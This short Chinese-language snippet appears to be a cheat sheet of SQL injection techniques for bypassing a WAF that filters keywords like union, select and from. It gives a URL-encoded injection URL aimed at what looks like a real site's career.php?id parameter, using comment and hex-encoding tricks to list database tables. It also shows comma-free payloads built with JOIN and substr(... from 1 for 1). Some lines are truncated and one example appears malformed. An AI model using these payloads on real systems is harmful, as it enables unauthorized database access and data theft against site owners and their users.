waf过滤了 union select from 等关键词1.列当前库所有表http://jyht.co.uk/career.php?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,%28%53%45%4C%45%43%54%20%47%52%4F%55%50%5F%43%4F%4E%4...
绕过逗号
使用join关键字
select id,ip from client_ip where 1>2 union select from ((select user())a JOIN (select version())b);join基本使用例子:
使用 from 1 for 1
select substr(database() from 1 for...